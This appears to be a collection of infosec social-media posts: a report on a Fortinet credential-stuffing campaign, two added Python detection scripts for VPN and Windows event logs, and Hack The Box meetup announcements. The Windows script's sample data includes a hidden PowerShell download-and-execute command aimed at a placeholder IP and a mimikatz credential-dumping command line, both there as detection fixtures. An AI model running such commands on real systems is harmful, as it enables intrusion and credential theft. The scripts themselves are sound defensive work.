‼️🚨 BREAKING: 320,000 Fortinet firewall devices have been targeted in a campaign that has been dubbed 'FortiBleed'. Attackers were able to confirm 75,000 working credentials against the admin and SSL VPN interfaces.
The victims include really big names like Samsung, Oracle, Spotify, Sony, and more.
The data was first surfaced by researcher Volodymyr "Bob" Diachenko and analyzed by Hudson Rock and SOCRadar. The operation runs as a self-feeding loop. Attackers scan the internet for exposed Fortinet devices, then test each one against a curated list of passwords leaked from earlier Fortinet breaches and infostealer logs. Every successful login gets recorded into a verified database. They then turn each compromised box into a listening post, sniffing the traffic passing through the firewall to harvest fresh credentials, which go straight back into the scanner.
The scale is large. The group ran an estimated 1.16 billion credential attempts against more than 320,000 FortiGate targets, plus 2.1 billion brute-force tries against 160,000 MSSQL servers. In the deeper intrusions they intercept SSL VPN authentication hashes, crack them on a dedicated 45-GPU cluster, and move into internal Active Directory.
Diachenko confirmed full network compromises in Japan, Taiwan, Vietnam, Iraq, and Turkey, including a Turkish NATO defense contractor that had classified defense documents stolen.
If you run Fortinet, act now: rotate every VPN and admin credential, enforce MFA on all external gateways, restrict management access to approved sources, segment internal networks, and audit gateway logs for unusual logins. Hudson Rock has a free domain lookup at https://t.co/KLv2YiMtpm.
Data surfaced via the Hunt Intelligence, Inc. feed.
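The last bullet in the post, "audit gateway logs for unusual logins", is the one most teams skip, so here is a worked hunt over FortiGate-style SSL VPN events. This is an added example, not code from the post, from the researchers named above or from Fortinet. It assumes the device's key=value syslog layout with `user`, `remip` and `action` fields; the action strings `ssl-login-fail` and `tunnel-up` are assumptions you should check against your own firmware's logs, and the sample lines are constructed. It flags two patterns the campaign produces: one source IP trying several accounts (spraying), and a successful tunnel from an IP that was just failing (a stuffed credential that worked).

```python
"""Hunt for credential stuffing / spraying against a FortiGate SSL VPN from its event logs.

Added example, not from the original post or from Fortinet. Field names follow
FortiGate's key=value syslog style; the action strings and the sample lines are
constructed and must be checked against real device output before use.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: 203.0.113.5 sprays three accounts, then gets a tunnel as
# jdoe; 198.51.100.20 is a normal user who logs in and later fat-fingers once.
SAMPLE_LOGS = """\
date=2025-05-01 time=02:00:01 type="event" subtype="vpn" logdesc="SSL VPN login fail" action="ssl-login-fail" user="admin" remip=203.0.113.5
date=2025-05-01 time=02:00:03 type="event" subtype="vpn" logdesc="SSL VPN login fail" action="ssl-login-fail" user="jdoe" remip=203.0.113.5
date=2025-05-01 time=02:00:05 type="event" subtype="vpn" logdesc="SSL VPN login fail" action="ssl-login-fail" user="svc_backup" remip=203.0.113.5
date=2025-05-01 time=02:00:09 type="event" subtype="vpn" logdesc="SSL VPN login fail" action="ssl-login-fail" user="jdoe" remip=203.0.113.5
date=2025-05-01 time=02:00:12 type="event" subtype="vpn" logdesc="SSL VPN tunnel up" action="tunnel-up" user="jdoe" remip=203.0.113.5
date=2025-05-01 time=08:15:00 type="event" subtype="vpn" logdesc="SSL VPN tunnel up" action="tunnel-up" user="asmith" remip=198.51.100.20
date=2025-05-01 time=08:16:30 type="event" subtype="vpn" logdesc="SSL VPN login fail" action="ssl-login-fail" user="asmith" remip=198.51.100.20
"""

# key=value pairs; values may be bare (remip=1.2.3.4) or double-quoted.
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_line(line):
    """Split one key=value syslog line into a dict of string fields."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in KV_RE.finditer(line)}


def event_time(fields):
    return datetime.strptime(fields["date"] + " " + fields["time"], "%Y-%m-%d %H:%M:%S")


def analyze(log_text, window=timedelta(minutes=10), spray_users=3, fail_threshold=3):
    """Return alerts for spraying sources and for successes that follow a burst of failures.

    Failures are kept per source IP in a sliding time window, so an IP that
    fails once a day never trips the rules while a scanner does within seconds.
    """
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    events.sort(key=event_time)
    recent_fails = defaultdict(deque)  # remip -> deque of (timestamp, user) inside the window
    flagged_spray = set()
    alerts = []
    for e in events:
        ts, ip, user, action = event_time(e), e.get("remip"), e.get("user"), e.get("action")
        window_fails = recent_fails[ip]
        while window_fails and ts - window_fails[0][0] > window:
            window_fails.popleft()  # drop failures older than the window
        if action == "ssl-login-fail":
            window_fails.append((ts, user))
            tried = sorted({u for _, u in window_fails})
            if len(tried) >= spray_users and ip not in flagged_spray:
                flagged_spray.add(ip)
                alerts.append({"rule": "password_spray", "remip": ip,
                               "users": tried, "at": ts.isoformat()})
        elif action == "tunnel-up":
            prior = len(window_fails)
            if prior >= fail_threshold or ip in flagged_spray:
                alerts.append({"rule": "success_after_failures", "remip": ip, "user": user,
                               "prior_failures": prior, "at": ts.isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOGS):
        print(alert)
```

Run it against a day of exported VPN events and every `success_after_failures` hit is an account to force-reset first, before the bulk rotation. The thresholds are deliberately low because stuffing from a verified-credential list needs few attempts per account; tune `spray_users` up if you have shared NAT egress IPs that legitimately fail for many users.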
@IceSolst Mine got suspended, I paid later and added my CPEs, then … abracadabra I’m reinstated. But I only need it as a “mandatory” on some contracts, so I maintain it (just enough to keep it).
@kmcnam1 @alantrask1 @rickmarazzani What the hell is wrong with people?? That’s insanity. Dudes getting upset because you’re teaching others is bonkers. Keep up the good work!
1997: Nmap was first released as a simple port scanner via an article in issue 51 of Phrack magazine which included the source code.
That's right - 28 years of Nmap!
Ding dong, the 2010s called – they want their TTPs back.
Amazing how you can still completely own companies using decade-old techniques:
- PSExec for RDP prep
- Mimikatz dumped in C:\PerfLogs
- LOLbin-fueled network recon
- A scheduled task beaconing to some shady IP
It still works. Because outside our infosec echo chamber, most orgs are stuck in 2005 – one antivirus, a firewall, and a prayer.
Meanwhile, we’re debating AI-driven XDR orchestration with autonomous response in the cloud. Reality check: most businesses can’t even tell if PSExec is on their network.
https://t.co/yTQnaGYcVr
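The four TTPs in that list each leave an obvious record on the host, which is the point: telling whether PsExec is on your network is a log query, not an XDR purchase. The following is an added example, not code from the post or from any vendor. It runs rules over Windows event records in the shape a JSON log forwarder emits (event ID plus the event's named fields); the field names follow Security event 7045/4698/4688 and Sysmon event 1, but the records themselves are constructed sample data. It covers a PsExec service install, a binary executing out of C:\PerfLogs, a scheduled task whose action pulls from a bare IP, and a burst of recon LOLBins on one host.

```python
"""Flag the decade-old TTPs from the post in exported Windows event records.

Added example, not from the original post. Records are constructed here as
plain dicts (event_id, computer, fields) in the shape a JSON log forwarder would
emit; field names follow Windows Security/Sysmon event data, values are invented.
"""
import re
from collections import defaultdict

SAMPLE_EVENTS = [
    # System 7045: PsExec drops its service with the default name.
    {"event_id": 7045, "computer": "FS01", "fields": {
        "ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe",
        "ServiceType": "user mode service", "StartType": "demand start"}},
    # Sysmon 1: renamed mimikatz run from C:\PerfLogs; the PE version info still says mimikatz.
    {"event_id": 1, "computer": "FS01", "fields": {
        "Image": "C:\\PerfLogs\\mk.exe", "OriginalFileName": "mimikatz.exe",
        "CommandLine": "mk.exe \"sekurlsa::logonpasswords\" exit",
        "ParentImage": "C:\\Windows\\PSEXESVC.exe"}},
    # Security 4698: scheduled task whose action downloads from a raw IP.
    {"event_id": 4698, "computer": "WS-042", "fields": {
        "TaskName": "\\Microsoft\\Windows\\Updater", "SubjectUserName": "jdoe",
        "TaskContent": "<Task><Actions><Exec><Command>powershell.exe</Command>"
                       "<Arguments>-nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                       ".DownloadString('http://203.0.113.9:8080/a')\"</Arguments>"
                       "</Exec></Actions></Task>"}},
    # Sysmon 1 x3: LOLBin recon burst on WS-042.
    {"event_id": 1, "computer": "WS-042", "fields": {
        "Image": "C:\\Windows\\System32\\net.exe", "CommandLine": "net group \"domain admins\" /domain"}},
    {"event_id": 1, "computer": "WS-042", "fields": {
        "Image": "C:\\Windows\\System32\\nltest.exe", "CommandLine": "nltest /dclist:corp"}},
    {"event_id": 1, "computer": "WS-042", "fields": {
        "Image": "C:\\Windows\\System32\\whoami.exe", "CommandLine": "whoami /all"}},
    # Benign process start that must not be flagged.
    {"event_id": 1, "computer": "WS-042", "fields": {
        "Image": "C:\\Windows\\System32\\svchost.exe", "OriginalFileName": "svchost.exe",
        "CommandLine": "svchost.exe -k netsvcs -p", "ParentImage": "C:\\Windows\\System32\\services.exe"}},
]

IPV4_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?", re.I)
RECON_TOOLS = {"net.exe", "net1.exe", "nltest.exe", "whoami.exe", "nbtstat.exe", "dsquery.exe", "quser.exe"}


def image_of(fields):
    """Process image path from Sysmon 1 (Image) or Security 4688 (NewProcessName)."""
    return fields.get("Image") or fields.get("NewProcessName") or ""


def rule_psexec_service(ev):
    if ev["event_id"] != 7045:
        return None
    f = ev["fields"]
    if "PSEXESVC" in (f.get("ServiceName", "") + " " + f.get("ImagePath", "")).upper():
        return f"PsExec service installed: {f.get('ServiceName')} -> {f.get('ImagePath')}"
    return None


def rule_perflogs_exec(ev):
    if ev["event_id"] not in (1, 4688):
        return None
    image = image_of(ev["fields"])
    if image.lower().startswith("c:\\perflogs\\"):  # PerfLogs is normally empty; nothing should run from it
        return f"process launched from C:\\PerfLogs: {image} (OriginalFileName={ev['fields'].get('OriginalFileName', '?')})"
    return None


def rule_task_to_ip(ev):
    if ev["event_id"] != 4698:
        return None
    m = IPV4_URL.search(ev["fields"].get("TaskContent", ""))
    return f"scheduled task {ev['fields'].get('TaskName')} fetches {m.group(0)}" if m else None


PER_EVENT_RULES = [rule_psexec_service, rule_perflogs_exec, rule_task_to_ip]


def triage(events, recon_threshold=3):
    """Apply per-event rules, then count distinct recon LOLBins per host (single ones are noise)."""
    findings, recon_by_host = [], defaultdict(set)
    for ev in events:
        for rule in PER_EVENT_RULES:
            reason = rule(ev)
            if reason:
                findings.append({"computer": ev["computer"], "event_id": ev["event_id"],
                                 "rule": rule.__name__, "reason": reason})
        if ev["event_id"] in (1, 4688):
            exe = image_of(ev["fields"]).rsplit("\\", 1)[-1].lower()
            if exe in RECON_TOOLS:
                recon_by_host[ev["computer"]].add(exe)
    for host, tools in sorted(recon_by_host.items()):
        if len(tools) >= recon_threshold:
            findings.append({"computer": host, "event_id": None, "rule": "lolbin_recon_burst",
                             "reason": f"{len(tools)} distinct recon LOLBins: {', '.join(sorted(tools))}"})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Two caveats a practitioner will hit: `psexec -r` renames the service (and its named pipe), so the 7045 rule only catches default usage and should be paired with a rule on any freshly installed service whose binary sits in `%SystemRoot%` root; and the PerfLogs rule relies on Sysmon's `OriginalFileName` only for naming the finding, the path alone is enough to fire, which is what you want, since the binary will not be called mimikatz.exe.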
🚀 Last Chance to Join @hackthebox_eu Ottawa Meetup #14 tomorrow!
Don’t miss out on this online event where we’ll dive into WifineticTwo, exploring vulnerabilities like Remote Code Execution and WPS attacks. Whether you’re a beginner or a pro, you’ll gain hands-on insights to boost your skills.
👩‍💻 When: December 19th, 6 PM ET
💻 Register Now: https://t.co/I2lMXa2I4G
Let’s hack, learn, and grow together. See you there! 🔐
@DavidJBianco Comments like “if you think ‘x’, you don’t know what you’re talking about” are what stifle careers. Especially from a SANS instructor, who is supposed to be helping and encouraging others. Why not educate, instead of generalizing, and try to help others?
🔍 Ready to put your detective skills to the test? Join us for the Sherlock Challenge on Hack The Box!
🗓️ Date: Thursday, 26 September 2024
⏰ Time: 6pm ET
🌐 Event: Online
🔗 Sign up here: https://t.co/2OPclqiRaX
Investigate and defend as you go through a complex cyber attack, testing your ability to uncover the truth! 🛡️
Are you up for the challenge? 🕵️‍♂️ #CyberSecurity #HackTheBox #SherlockChallenge #DefensiveSecurity #CTF #BlueTeam
See you there!
Love seeing this type of engagement in the @hackthebox_yow meetups! This may have been our best yet! Grateful to @cybermalvik for organizing and including me in the fun, and to everyone who joins us monthly for our #purpleteam escapades!
Shoutout to the organizing team for bringing this together, got to learn so much especially on the blue side of things with @bowersbrews and the host @cybermalvik .
🔥😂 Ended up leaving the meet with a VIP+ voucher and 500 cubes. Thank you @hackthebox_yow @hackthebox_eu
This is going to be fun! Come watch JF work his Red Team magic, and expect a bit more on the DFIR side coming from the Blue Team side of the house! #DFIR #Cybersecurity #Ottawa
New HTB Ottawa Meetup is coming August 29th.
Make sure you sign up and join the stream. Free access to a lab environment for pure hands-on experience. Education through videos and text is an excellent way to learn and get started, but experience will hands down make you a better and more knowledgeable hacker.
Join us on the 29th online or Discord!
https://t.co/VK1rRv5WKg
Started this article a couple of years ago after a frustrating meeting. "Good Enough" does not end well, but you may never know if your detection measures are "Good Enough". Rant first, then some suggestions for improvement! #infosec #cybersecurity #rant
https://t.co/11u3M6rRts
🚀 HackTheBox Ottawa Meetup Event: StreamIO 🚀
Join us for an in-depth session on StreamIO, a Windows medium difficulty machine that tests your skills!
🟣 Purple Team Insights:
Explore both the offensive and defensive sides of cybersecurity, enhancing your understanding of comprehensive security strategies.
📅 Date & Time: Thursday, April 25th, 2024, at 6 PM
🔗 RSVP: https://t.co/qqTNjNHslg
🔍 What You’ll Uncover:
1. Subdomain Enumeration & SQL Injection: Explore hidden subdomains and exploit SQL injection for user credentials.
2. Local File Inclusion (LFI): Access and exploit admin panels and source code through LFI.
3. Privilege Escalation: Use LDAP abuse and PowerShell for higher-level access.
📚 Skills in Focus:
- SQL injections
- LFI with PHP wrappers and Source Code Review
- Remote File Inclusion exploitation
- Browser saved credentials retrieval and cracking
- LDAP enumeration and exploitation for lateral movement
- LDAP abuse for advanced privilege escalation
- LAPS password exposure
This session is a must-attend for anyone looking to sharpen their pentesting skills or delve into the world of cybersecurity!
#HackTheBox #StreamIO #CyberSecurity #Pentesting #PurpleTeam